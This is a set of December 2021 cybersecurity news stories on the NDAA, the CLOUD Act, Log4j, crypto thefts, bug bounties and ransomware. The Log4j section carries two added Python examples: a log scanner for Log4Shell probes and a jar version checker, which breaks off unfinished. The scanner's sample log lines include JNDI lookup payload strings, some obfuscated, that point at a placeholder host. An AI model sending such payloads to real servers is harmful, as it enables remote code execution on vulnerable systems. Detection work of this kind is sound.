More stories


    US Senate passes $768 billion defense bill without cyber incident reporting provisions

    The US Senate passed the National Defense Authorization Act (NDAA) on Wednesday, approving the $768 billion annual defense spending bill that was packed with cybersecurity provisions. The bill now heads to the desk of President Joe Biden. In an explainer document released alongside the text of the bill, the US House of Representatives Armed Services Committee said the cyber provisions in the bill would initiate “the widest empowerment and expansion of CISA through legislation since the SolarWinds incident.” In addition to significantly more cybersecurity investments, the bill gives greater budget authority to the Commander of US Cyber Command, “modernizes” the relationship between the Department of Defense Chief Information Officer and the National Security Agency’s components responsible for cybersecurity, and establishes a program office within Joint Forces Headquarters-DODIN to centralize the management of cyber threat information products across the Defense Department. The bill also mandates the first taxonomy of cyber weapons and cyber capabilities and requires the Defense Secretary to create a software development and acquisition cadre to assist with developing and acquiring software by providing expert advice, assistance, and resources. A grant program created by Congress will fund cybersecurity research in coordination with Israel. A National Cyber Exercise program is also outlined in the bill. It will force CISA and other government bodies to test the National Cyber Incident Response Plan and, “to the extent practicable, simulate the partial or complete incapacitation of a government or critical infrastructure network resulting from a cyber incident.” An amendment also requires CISA to update its incident response plan at least every two years. Thanks to the bill, the DOD is now required to submit a report on how its Cybersecurity Maturity Model Certification program affects small businesses.

    Experts also touted the addition of the apprentice program to expand the available cyber talent, as well as the veteran training program. CISA is given more funding for a program called “CyberSentry” that provides “continuous monitoring of cybersecurity risks to critical infrastructure that own or operate industrial control systems that support national critical functions.”

    Bill Lawrence, CISO at SecurityGate, said CyberSentry was a somewhat controversial provision because it says CISA “may access all network traffic, including the content of communications, as stored within the CyberSentry stack to further analyze the origins of an alert and/or evaluate the state of the network.” “There are valid reasons for CISA to help protect US critical infrastructure just as there are valid reasons for CI owners and operators to not want government sensors on their networks, as well as valid arguments from security providers that the government is giving cyber services away for free (using taxpayer money, of course),” Lawrence said. “DHS does include a great deal of privacy considerations in the CyberSentry write-up. It would be helpful to also read about the tactical and strategic objectives of this program and see if rapid information sharing with all CI asset owners and operators is included, and help determine if this juice is worth the squeeze on the commercial providers. I have my apprehensions.”

    But what garnered the most interest was what the bill was lacking, namely a cyber incident reporting provision that was hotly debated and ultimately scuttled at the last minute. For months, Democratic and Republican Senators jockeyed over the language of a cyber incident reporting provision in the NDAA. In November, two Democrats — Gary Peters and Mark Warner — worked alongside two Republicans — Rob Portman and Susan Collins — to introduce a new amendment to the NDAA that would have forced critical infrastructure owners and operators as well as civilian federal agencies to report all cyberattacks and ransomware payments to CISA. But by December, The Washington Post reported that Florida Senator Rick Scott took issue with the ransomware reporting provision and called it too broad, asking senators to limit the language to enterprises in the 16 critical industries.

    Sources told CyberScoop’s Tim Starks that debate over the ransomware language ran too long and negotiators in the House and Senate ended up leaving the entire provision out. Lawrence noted that some companies had issues with reporting breaches or ransomware attacks within 72 hours of discovery and ransom payments within 24 hours of payout. He explained that smaller organizations do not have a 24/7 security operations center available to them, which limits their ability to respond to such incidents, much less tell the US government what is happening during incident response. Rep. Bennie Thompson and Rep. Yvette Clarke noted that cybersecurity incident response legislation was included in the House NDAA, which passed in September. The two — who respectively serve as Chairman of the Committee on Homeland Security and Chairwoman of the Subcommittee on Cybersecurity, Infrastructure Protection, & Innovation — explained in a statement that there were intensive efforts to get cyber incident reporting in the bill but “ultimately the clock ran out on getting it in the NDAA.” “There was dysfunction and disagreement stemming from Senate Republican leadership that was not resolved until mid-morning today – well past the NDAA deadline. This result is beyond disappointing and undermines national security,” Thompson and Clarke said. “We had hoped to mark the one-year anniversary of the discovery of the SolarWinds supply chain attack by sending cyber incident reporting legislation to the President’s desk. Instead, Senate Republican leaders delayed things so significantly that the window closed on getting cyber incident reporting included in the NDAA. We are profoundly disappointed that the momentum we had coming into the NDAA did not yield success but are fully committed to working across the aisle and with the Senate to find another path forward.”


    US and Australia enter CLOUD Act agreement for cross-border access to electronic evidence

    Australia and the United States have entered into a landmark CLOUD Act agreement to bolster efforts in preventing serious organised crime, terrorism, ransomware attacks, critical infrastructure sabotage, and child sexual abuse. The Clarifying Lawful Overseas Use of Data Act, known as the CLOUD Act, is a US legal instrument that allows law enforcement to access data across borders. “Signing the CLOUD Act Agreement will enable our two nations’ law enforcement agencies to share important digital information and data with each other, under carefully defined legal authorities and safeguards,” said Karen Andrews, Australia’s Minister of Home Affairs. Through the bilateral agreement, Australia’s law enforcement agencies gain the ability to issue orders directly to US-based service providers compelling them to provide communications data for the purposes of combatting serious crime, and vice versa. Previously, Australian law enforcement agencies could only rely on mechanisms such as mutual legal assistance agreements to access crucial evidence from other countries, which Home Affairs has flagged as complex and time-consuming. It’s the second CLOUD Act agreement to come into force, after a similar one was finalised between the UK and US in 2019. “This agreement paves the way for more efficient cross-border transfers of data between the United States and Australia so that our governments can more effectively counter serious crime, including terrorism, while adhering to the privacy and civil liberties values that we both share,” said US Attorney-General Merrick Garland.

    Australia and the US have been working on an agreement since 2019, but Australia needed to implement other legislation over the past two years in order to establish the required framework for a CLOUD Act agreement to exist. Over that span, the Australian government has faced scrutiny over its push for a CLOUD Act agreement, with privacy advocates like the Australian Privacy Foundation saying such an agreement “conflated bureaucratic convenience with what is imperative”. The CLOUD Act agreement comes on the heels of Australia announcing various initiatives in recent months to prevent crime. In December alone, Australia has announced the Online Safety Youth Advisory Council, passed “Magnitsky-style” and Critical Infrastructure cyber attack laws, commenced work on electronic surveillance law reforms, and proposed anti-trolling laws. The Australian government also started work on a new ransomware plan back in October. While some of those initiatives have drawn praise, others have drawn criticism for being rush jobs and lacking nuance. The bilateral agreement will now undergo parliamentary and congressional review processes in both countries before it is finalised.


    Cybersecurity experts debate concern over potential Log4j worm

    As the fallout from the Log4j vulnerability continues, cybersecurity experts are debating what the future might hold. Tom Kellermann, VMware’s head of cybersecurity strategy, said the Log4j vulnerability is one of the worst vulnerabilities he has seen in his career — and one of the most significant vulnerabilities ever to have been exposed. Log4j, a Java library for logging error messages in applications, was developed by the Apache Software Foundation. Kellermann called Apache “one of the giant supports of the bridge between the world’s applications and compute environments,” adding that the exploitation of Log4j will “destabilize that support and… destabilize the digital infrastructure that’s been built on top of it.”


    But his greatest concern is that someone further weaponizes the vulnerability by creating a worm, which Kellermann described as a polymorphic type of malware that can essentially spread on its own. “One of the most significant [worms] from back in the early 2000s was Code Red,” Kellermann told ZDNet. “We haven’t seen a widespread global impact like that since then. If this vulnerability were to be weaponized by one of the cyber communities — whether it be intelligence services, one of the four major rogue powers in cyber, or one of the major cybercrime cartels — that’s when things will get more interesting.” The possibility of a worm has generated significant conversation in the cybersecurity community. Cybersecurity expert Marcus Hutchins called fears of a worm “overblown” in multiple Twitter threads. “Firstly, there’s already mass exploitation (you can spray the entire internet from one server). Secondly, worms take time and skill to develop, but most attackers are racing against the clock (patching and other attackers),” Hutchins wrote on Twitter.

    He added that “a worm would need a novel exploitation technique to gain any real value over scanning.” In another thread, Hutchins wrote that 2017’s WannaCry ransomware attack “gave people a way overinflated sense of the threat posed by worms,” adding that worms “aren’t a worst case scenario (or even a worse case scenario) for most exploits.” “It’s not a case of there’s an exploit so there will be a worm (we never saw worms for any of the recent wormable RCEs and even if we had it’d be no worse than regular exploitation). WannaCry was written by North Korea, using an NSA exploit, stolen by Russia. Not the norm,” Hutchins explained. Steve Povolny, head of advanced threat research for McAfee Enterprise and FireEye, told ZDNet that his biggest concern is around “wormability,” adding that he couldn’t “think of a worse scenario for Log4j exploits than malicious code that can replicate and spread itself with incredible speed, delivering ransomware payloads.” Povolny said worms like WannaCry demonstrated the type of impact that cybersecurity experts could expect, noting that even the WannaCry example was cut short from its true potential for spread and disruption due to a “kill switch.” “We can’t hope to get as lucky this time — it’s not a matter of if, it’s a matter of when this will happen. Organizations of all sizes must be undergoing an aggressive reconnaissance and patching strategy while there is still time,” Povolny said. “If you ever watched the TV show ‘The Amazing Race’, it now seems to pale in comparison to the global race taking place as a result of Log4Shell [the vulnerability’s nickname]. Even as thousands of organizations worldwide continue to search for and patch this exceptional vulnerability, threat actors are working at a furious pace to weaponize and further refine exploits for the flaw.” Others, like BreachQuest CTO Jake Williams, said that while it is a certainty someone will create a worm that abuses Log4Shell, it is unlikely to be like WannaCry, NotPetya, or previous worms that abuse system-level processes.

    The vast majority of servers vulnerable to Log4Shell will be running the vulnerable process with very limited permissions, Williams explained, adding that in most cases, a worm exploiting Log4Shell would probably not be able to achieve persistence across process restarts. Because the process probably doesn’t have filesystem permissions, Williams said people should be less worried about ransomware payloads. “A malicious process can’t encrypt what it can’t write in the first place. While we should absolutely expect a Log4Shell worm to be created, we shouldn’t conflate the expected damage of a worm with what has been seen in previous high profile worms,” Williams said. Salt Security vice president Yaniv Balmas said his team is already seeing cases where the Log4Shell vulnerability is used by “common” cybercrime-related operations in order to spread ransomware, calling a wormable exploit a “valid scenario.” Balmas noted that even today, the world is still seeing artifacts from similar worms that were launched years ago. If someone decides to embed this vulnerability into a worm, Balmas said it would be “almost impossible to stop once it reaches a critical mass.” “However, while not neglecting the impact of such a worm, that might not be the worst scenario because of the unbelievable ease with which this attack can be applied. Everyone with a basic computer and internet access could launch an attack against millions of online services within minutes,” Balmas said. Thankfully, some cybersecurity experts said the head start in dealing with detection, mitigation, and patching will help as they prepare for the worst. John Bambenek, principal threat hunter at Netenrich, said a worm would have been far worse last week. But the industry-wide work being done made sure many of the most vulnerable machines are in a better place. Others said that while the vulnerability is wormable, there has been no evidence to suggest this is a priority for threat actors at this time.

    Worms also require a significant amount of time and effort to develop, according to Digital Shadows senior analyst Chris Morgan. “This activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue. It’s still very much early days with regards to Log4j,” Morgan said. “While many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm.” Vectra CTO Tim Wade echoed that sentiment, noting that the Log4j vulnerability is still mostly at risk from attack by creative and adaptive human adversaries that may leave fewer fingerprints behind them as they undertake less overt attacks — such as extracting cryptographic secrets or API keys for present or future campaigns. While a worm enabling further mass exploitation is problematic, Wade said less direct attacks “may introduce more lasting damage when they go undetected for great lengths of time.”


    After theft of $77.7 million, victim AscendEX to reimburse customers

    Crypto platform AscendEX has pledged to reimburse its customers, who lost a total of $77.7 million in a hack on December 11. In a series of tweets, the company said it is in the process of “standing up a new hot wallet infrastructure” and estimated that deposits and withdrawals would resume over the next two days.

    “Doing right by our customers is our obligation. Any impacted customers will be 100% reimbursed for their losses. Especially in the cryptocurrency industry, where community is the driving force of innovation, it is important for AscendEX to always remain true to our users,” the company said. “We plan to resume withdrawals gradually, beginning with Ethereum. Any user that wishes to withdraw their assets will be permitted to do so in an uninterrupted capacity once withdrawals reopen for the particular coin or token.” Blockchain security company PeckShield estimated that $77.7 million in total was taken across three chains: $60 million from Ethereum, $9.2 million from Binance Smart Chain, and $8.5 million from Polygon. The hack began on Saturday at 5pm EST when the company saw a number of unauthorized transfers from one of their hot wallets. The cold wallets were unaffected, and the company transferred all other assets there as they investigated the attack. Blockchain analytics firms were hired to help with the response, and law enforcement was notified. AscendEX contacted other crypto exchanges so that wallets involved in the theft could be blacklisted. It pledged to release a security post-mortem report in the coming days.

    AscendEX is based in Singapore and closed a $50 million Series B funding round in November, with investments from Polychain Capital, Jump Capital, Alameda Research, and others. The company was founded in 2018 under the name “Bitmax” before switching to AscendEX. CoinDesk reported that the company claims to have more than one million retail and institutional clients. It has reportedly reached an average daily trading volume of more than $200 million. The AscendEX losses became the latest in a series of headline-grabbing attacks with eye-popping numbers. On Sunday, blockchain gaming company Vulcan Forged said around $140 million had been stolen from their users. They, too, were forced to reimburse victims. Last week, crypto trading platform BitMart released an update on the devastating security breach that caused about $200 million in losses, writing that the breach was “mainly caused by a stolen private key that had two of our hot wallets compromised.” Hackers have repeatedly attacked cryptocurrency and DeFi platforms over the last year. Just last month, cybercriminals stole about $120 million from DeFi platform Badger. Other attacks in 2021 include thefts of more than $600 million from Poly in August and $34 million from Cream Finance in September. In May, about $200 million was stolen from the PancakeBunny platform. The Record and Comparitech keep running tallies of cyberattacks on cryptocurrency platforms, noting recent attacks on Liquid, EasyFi, bZx, and many other platforms.


    Meta targets user information, database scraping in bug bounty expansion

    Meta has announced an expansion to its bug bounty platform to include vulnerabilities that can be abused for data scraping. 

    On Wednesday, the company – recently rebranded from Facebook – said that the two new areas of research revolve around scraping bugs and scraped databases containing user information. Dan Gurfinkel, Security Engineering Manager, said that the inclusion of valid scraping bugs and exposed data sets in a bug bounty program are, to the firm’s knowledge, an “industry first.” Meta/Facebook has been involved in numerous incidents around user data scraping. The most well-known is the Cambridge Analytica scandal, in which the data of up to 87 million users was scraped and shared without their consent. More recently, information belonging to approximately 553 million Facebook users was dumped online. Meta said the mass data collection took place in 2019. “We know that automated activity designed to scrape people’s public and private data targets every website or service,” Gurfinkel says. “We also know that it is a highly adversarial space where scrapers — be it malicious apps, websites or scripts — constantly adapt their tactics to evade detection in response to the defenses we build and improve.” To assist the company in fixing data-scraping issues across its apps and services rapidly, Meta is looking for reports on vulnerabilities that allow scraping limit mechanisms to be bypassed and those that permit scraping “at a greater scale than the product intended.” In particular, Meta is urging researchers to look for logic bypass issues, although rate limiting errors are in-scope, too.

    Scraped database reports will cover unprotected and open public databases, discovered online, which contain at least 100,000 records of unique users, as well as sensitive information such as email addresses and phone numbers. Financial rewards starting at $500 are on offer for scraping bugs, and scraped database reports will be matched with charity donations. Feedback will be sought from the firm’s “top” bug bounty hunters before expansion. Gurfinkel also outlined the company’s progress with bug bounties. Since the program’s launch in 2011, over 150,000 bug reports have been received and over 7,800 have been awarded a bounty payment. In total, Meta has now paid out over $14 million. Over the course of 2021, Meta has awarded $2.3 million to researchers for 800 vulnerability reports out of approximately 25,000. Earlier this month, Meta increased the scope of Facebook Protect, a service designed to enhance the security of user accounts considered to be at higher risk of compromise by threat actors. By the end of this year, Facebook Protect should be rolled out to over 50 countries. In the same way as Google and Microsoft, Meta offers this service to individuals including lawyers, journalists, civil rights organization members, and political figures.


    New “Hack DHS” program will pay up to $5,000 for discovered vulnerabilities

    The US Department of Homeland Security is launching its own bug bounty program to help find and correct gaps in its systems. 


    The new “Hack DHS” program was made official by Homeland Security Secretary Alejandro Mayorkas in a press release on the agency’s website after it was revealed at the recent Bloomberg Technology Summit and covered by The Record. The program promises to pay out between $500 and $5,000 to “vetted cybersecurity researchers who have been invited to access select external DHS systems.” The actual payout will be based on the severity of the specific vulnerability discovered. As noted by DHS, this new bounty program builds on similar private-sector efforts and “Hack the Pentagon,” a first-of-its-kind program launched in 2016 that was ultimately responsible for identifying over 100 vulnerabilities across various Defense Department assets. The DHS itself created a similar pilot program in 2019 on the back of a bipartisan bill. It followed related efforts from the Department of Defense, Air Force, and Army. “The Hack DHS program incentivizes highly skilled hackers to identify cybersecurity weaknesses in our systems before they can be exploited by bad actors,” Mayorkas noted. The effort will include three phases that will run throughout FY 2022. In the first phase, hackers will be called on to conduct a “virtual assessment” on select DHS systems. This will be followed by a “live, in-person hacking event” during phase two, and an identification and review process during the third and final phase. The DHS noted that it will use the data collected during this process both to plan for future bug bounties and to develop “a model that can be used by other organizations across every level of government to increase their own cybersecurity resilience.” Like previous government programs of a similar nature, this one will be governed by rules orchestrated by the DHS’ Cybersecurity and Infrastructure Security Agency (CISA), with all participants required to fully disclose any information that could be useful in mitigating and correcting the vulnerabilities they discover.

    The hope for programs like this one is to privately discover and patch holes without relying on external security researchers or random discoverers to do the scrupulous thing and inform the vendor/agency before releasing a vulnerability into the wild. This effort appears particularly timely in a world where governments, businesses, and just about everyone that owns a computer continue to deal with the fallout from the very public disclosure and rapid exploitation of the Log4j vulnerability.


    Ransomware in 2022: We're all screwed

    Ransomware is now a primary threat for businesses, and with the past year or so considered the “golden era” for operators, cybersecurity experts believe this criminal enterprise will reach new heights in the future. 


    Kronos. Colonial Pipeline. JBS. Kaseya. These are only a handful of 2021’s high-profile victims of threat groups including DarkSide, REvil, and BlackMatter. According to Kela’s analysis of dark web forum activity, the “perfect” prospective ransomware victim in the US will have a minimum annual revenue of $100 million, and preferred access purchases include domain admin rights as well as entry into Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) services. Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. Instead, malware families in this arena — including WannaCry, NotPetya, Ryuk, Cerber, and Cryptolocker — can be one component of attacks designed to elicit a blackmail payment from a victim organization. Cisco Secure calls current ransomware tactics “double-extortion.” Victims will have their systems encrypted in one facet of an attack, and a ransom note will demand payment, normally in Bitcoin (BTC). However, to pile on the pressure, ransomware groups may also steal corporate data before encryption and will threaten to publish or sell on this information, too, unless a payment is agreed upon and made. The European Union Agency for Cybersecurity (ENISA) said there was a 150% rise in ransomware attacks between April 2020 and July 2021. According to the agency, we are experiencing the “golden era of ransomware,” in part due to multiple monetization options.

    This is particularly notable in “big game hunting,” in which ransomware operators specialize in going after large and profitable companies. With this in mind, what can we expect from ransomware operators in 2022?

    Ransomware-as-a-Service will continue to climb

    Ransomware-as-a-Service (RaaS) is an established industry within the ransomware business, in which operators lease out or offer subscriptions to their malware creations to others for a price — whether this is a per-month deal or a cut of any successful extortion payments. Considering the lucrative nature of RaaS and the difficulty of tracking down and prosecuting operators, it should come as no surprise that many security experts believe this business model will continue to flourish in 2022. “We’re going to see a continued increase in the severity and volume of ransomware attacks,” commented Andy Fernandez, senior product marketing manager at HPE company Zerto. “In response, we will see a growth in the ransomware-as-a-service market, which is able to propagate new versions and new methods in a much faster way than before. Whether you are a small business or large enterprise, at some point, you will be targeted by a ransomware attack that will try to get into your system and encrypt your critical data.”

    Increased attack risk


    An emerging trend documented by CrowdStrike is multiple attacks leveraged against organizations once they have been successfully compromised. Data exfiltration and extortion go hand-in-hand, and according to CTO Mike Sentonas, in addition to the threat of sensitive data becoming public, “some criminals have been known to sell files to each other or even to a competitor in a foreign market.” “This means that even if a company has paid one criminal gang, another could emerge from the shadows and demand precisely the same thing,” Sentonas says. Other experts, including those from Picus Security, suggest that we may see more extortion methods become commonly employed – such as launching Distributed Denial-of-Service (DDoS) attacks or the harassment of customers and partners.

    Pay to stay away?

    Another potential method of extortion we may see next year is that of companies paying operators not to attack them. Joseph Carson, Chief Security Scientist at ThycoticCentrify, suggests that while RaaS is already in full swing, “ransomware could even evolve further into a subscription model in which you pay the criminal gangs to not target you.”

    The Great Resignation

    The COVID-19 pandemic has, perhaps permanently, changed the face of work. Many of us were forced to work from home and have now adopted home office setups — and in many cases — have decided to resign from existing posts to pursue other opportunities. Thales believes that in 2022, what is known as The Great Resignation will also have ramifications for cybersecurity, predicting a “direct correlation between staff turnover and cyber incidents.” According to the firm, organizations that have already lost staff will have to train new employees who are unfamiliar with existing protocols and may not have adequate levels of security awareness.

    Business ecosystems contain many different processes, partners, and software, which may increase the risk of a business becoming compromised, and ransomware may be one of the top threats companies face today. “There is also the issue of fatigued or disgruntled workers,” Thales says. “Even if they are not malicious, they may be increasingly lax in following employee guidelines. In 2022, the cost to replace an employee needs to go beyond recruitment and training costs. And after the rush to fill seats, organizations need to double down on training and onboarding.”

    Going quantum?

    BlackBerry CISO John McClurg predicts that emerging technologies may also have an impact on how ransomware is used in 2022 and beyond. Quantum computing, the concept of using quantum physics to enhance a computer’s ability to perform calculations, could be one of these areas. While outside of the realm of most attackers, McClurg says that leaps forward in quantum computing could also be leveraged to develop new attack vectors. “One of the more controversial uses of quantum computing is its potential to break public-key cryptography,” the executive explained. “In just a few short years, security information stored by national and international intelligence will be easily decrypted through a powerful quantum computer. This will leave highly sensitive data vulnerable to threat actors, causing an enormous potential for widespread security breaches.”

    Implications for cyber insurance


    The explosion in high-profile ransomware attacks is also potentially going to cause massive shifts in cyber insurance, premiums, and whether or not ransomware incidents will be covered at all.

    Also: What is cyber insurance? What it covers and how it works

    With blackmail payouts now reaching millions of dollars, insurers are likely to re-examine whether coverage can be offered — and if so, will impose strict requirements on the cases in which a policy will pay out. This may include bans on paying a ransom entirely, forcing applicants to adhere to industry-accepted security standards, agreeing to consistent employee training, and more.

    Ritesh Singhai, Senior Director, EMEA Solutions at Secureworks, told ZDNet that there will be a “watershed” moment for cyber insurance providers in the future, and coverage for some threats — including ransomware — will become “prohibitively expensive.”

    Also: Cyber insurance might be making the ransomware crisis worse, say researchers

    “None of this will fundamentally change the threat that organizations face, although the challenges around recouping a loss may change the risk calculation, increasing the value of effective preparation and incident response plans,” Singhai added.

  • Log4j flaw: Now state-backed hackers are using bug as part of attacks, warns Microsoft

    State-sponsored hackers from China, Iran, North Korea and Turkey have started testing, exploiting and using the Log4j bug to deploy malware, including ransomware, according to Microsoft.

    As predicted by officials at the US Cybersecurity and Infrastructure Security Agency (CISA), more sophisticated attackers have now started exploiting the so-called Log4Shell bug (CVE-2021-44228), which affects devices and applications running vulnerable versions of the Log4j Java library. It’s a potent flaw that allows remote attackers to take over an affected device. CISA officials on Tuesday warned that hundreds of millions of enterprise and consumer devices are at risk until the bug is patched.

    LOG4J FLAW COVERAGE – WHAT YOU NEED TO KNOW NOW

    The bulk of attacks that Microsoft has observed so far have been related to mass scanning by attackers attempting to fingerprint vulnerable systems, as well as scanning by security companies and researchers.

    “The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” Microsoft said.

    Its ease of exploitation and wide distribution in products makes it an attractive target for sophisticated criminal and state-sponsored attackers. It is this latter group that has now started exploiting the flaw.
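    The mass scanning Microsoft describes leaves traces in ordinary web-server access logs, because the lookup string has to arrive in some field the server records (User-Agent, Referer, the query string). The following is an added detection example, not code from the article or from Microsoft: it percent-decodes each line, collapses the nested-lookup tricks scanners use to hide the literal `jndi` keyword, and reports the client address, the protocol scheme and whether the request was obfuscated. The log lines, addresses and host names are constructed for the demonstration and are not real indicators.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines in Apache "combined" log format. Addresses come from the
# documentation ranges (203.0.113.0/24, 198.51.100.0/24) and the host names are placeholders.
SAMPLE_LOGS = [
    '203.0.113.5 - - [14/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain lookup string in the User-Agent field
    '203.0.113.7 - - [14/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example/a}"',
    # percent-encoded query string with a ${lower:j} nested lookup hiding the keyword
    '203.0.113.9 - - [14/Dec/2021:10:01:09 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2Fscanner.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    # Referer field using ${env:NAME:-default} lookups whose default values spell out the keyword
    '203.0.113.11 - - [14/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 512 "${${env:NaN:-j}ndi${env:NaN:-:}ldap://scanner.example/c}" "Mozilla/5.0"',
    # benign: the word "jndi" without a lookup expression must not alert
    '198.51.100.2 - - [14/Dec/2021:10:02:00 +0000] "GET /docs/jndi-guide.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# ${anything:-default} resolves to its default value; ${lower:x} / ${upper:x} only change case.
# Both patterns exclude braces so they always match the innermost lookup first.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
_CLIENT_IP = re.compile(r"^(\S+)")


def url_decode(text: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly; scanners frequently double-encode payloads."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def collapse_lookups(text: str) -> str:
    """Resolve nested lookups, innermost first, until the string stops changing."""
    while True:
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        resolved = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            resolved,
        )
        if resolved == text:
            return text
        text = resolved


@dataclass
class Finding:
    client_ip: str
    scheme: str        # ldap, ldaps, rmi, dns, ...
    obfuscated: bool   # True when decoding or lookup collapsing changed the line
    decoded: str


def inspect_line(line: str) -> Optional[Finding]:
    """Return a Finding if the line carries a JNDI lookup after normalisation."""
    decoded = collapse_lookups(url_decode(line))
    match = _JNDI_LOOKUP.search(decoded)
    if not match:
        return None
    ip_match = _CLIENT_IP.match(line)
    client_ip = ip_match.group(1) if ip_match else "?"
    return Finding(client_ip, match.group(1).lower(), decoded != line, decoded)


def scan(lines: List[str]) -> List[Finding]:
    """Run inspect_line over a batch of log lines and keep the hits."""
    return [f for f in (inspect_line(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        flag = "obfuscated" if finding.obfuscated else "plain"
        print(f"{finding.client_ip:<14} {finding.scheme:<6} {flag}")
```

    Normalising before matching is the whole point: a rule that looks for the literal `${jndi:` misses the third and fourth lines, while the decoded form catches all three probes and still ignores the benign URL that merely contains the word. The `obfuscated` flag is useful for triage, since deliberate evasion is a stronger signal than a plain scanner string.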

    “This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives,” Microsoft said.

    Microsoft has turned the spotlight on the Iranian hacking group it tracks as Phosphorus, which recently ramped up its use of file-encryption tools to deploy ransomware on targets. The group has acquired and modified the Log4j exploit for use, according to the Microsoft Threat Intelligence Center (MSTIC). “We assess that Phosphorus has operationalized these modifications,” the MSTIC notes.

    Hafnium, a Beijing-backed hacking group behind this year’s Exchange Server flaws, has also been using Log4Shell to “target virtualization infrastructure to extend their typical targeting.” Microsoft saw the systems used by Hafnium employing a Domain Name System (DNS) service to fingerprint systems.

    The Log4Shell bug was disclosed by the Apache Software Foundation on December 9. CERT New Zealand reported the bug was actively being exploited. Apache released a patch last week. However, vendors including Cisco, IBM, Oracle, VMware and others still need to integrate the patch into their own affected products before customers can deploy them.

    MSTIC and the Microsoft 365 Defender team also confirmed that “access brokers” – gangs who sell or rent access to compromised machines – have been using the Log4j flaw to gain a foothold in target networks on both Linux and Windows systems. This sort of access is frequently sold on to ransomware gangs looking for victims; security firm Bitdefender reported that a new ransomware strain called Khonsari is already attempting to exploit the Log4j bug.

    CISA yesterday published its list on GitHub of products affected by the Log4Shell flaw, following a similar list by the Netherlands cybersecurity agency (NCSC) published earlier this week.
    CISA lists the vendor, product, versions, status of vulnerability, and whether an update is available.

    LOG4J FLAW COVERAGE – HOW TO KEEP YOUR COMPANY SAFE

    The US list will be a handy tool for organizations as they patch affected devices, in particular US federal agencies that were ordered by CISA, a unit of the Department of Homeland Security, yesterday to test which internal applications and servers are vulnerable to the bug by December 24.

    Cisco customers will be busy over the next few weeks as it rolls out patches. Just looking at, for example, Cisco’s list of affected products highlights the work ahead for agency teams that must enumerate affected systems ahead of the Christmas break. CISA’s list also includes an extensive array of affected VMware virtualization software tools, most of which don’t have a patch available yet.

    Dozens of Cisco software and network products are affected. Cisco released a patch for Webex Meetings Server yesterday. The Cisco CX Cloud Agent Software also got a patch. Other affected Cisco products without a patch include Cisco’s AMP Virtual Private Cloud Appliance, its Advanced Web Security Reporting Application, Firepower Threat Defense (FTD), and Cisco Identity Services Engine (ISE). Several network infrastructure management and provisioning products are also vulnerable, with patches scheduled for December 21 and onwards.
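    Enumerating affected systems, as CISA has ordered agencies to do, means finding every copy of log4j-core on a host, including copies bundled inside WAR files and fat jars, rather than only the products on the vendor lists. The following is an added example, not code from the article, CISA, Cisco or the Log4j project: it reads the Maven `pom.properties` entry that log4j-core jars carry to recover the version, checks whether `JndiLookup.class` is still present (Apache's published mitigation for older releases is to delete that class from the jar), and recurses one level into nested jars. The fixture archives are constructed in a temporary directory and carry no real bytecode, and the fixed-version threshold is an assumption: set it from the advisory or CISA entry you are working from.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, Optional, Tuple

# Paths that real log4j-core jars contain: the Maven build metadata and the JNDI lookup class.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Assumption, not taken from the article: the first Apache release that fixed CVE-2021-44228.
# Treat it as a placeholder and set it from the advisory or CISA entry you are working from.
FIXED_VERSION = "2.15.0"


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); non-numeric qualifiers such as '-beta9' are ignored."""
    parts = []
    for piece in version.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def inspect_archive(zf: zipfile.ZipFile) -> Dict[str, object]:
    """Collect the two signals the classifier needs from an open zip/jar."""
    names = set(zf.namelist())
    version: Optional[str] = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    return {"version": version, "jndi_lookup_present": JNDI_LOOKUP_CLASS in names}


def classify(info: Dict[str, object], fixed_version: str = FIXED_VERSION) -> str:
    """Map the collected signals to a status string."""
    version = info["version"]
    present = info["jndi_lookup_present"]
    if version is None and not present:
        return "not-log4j-core"
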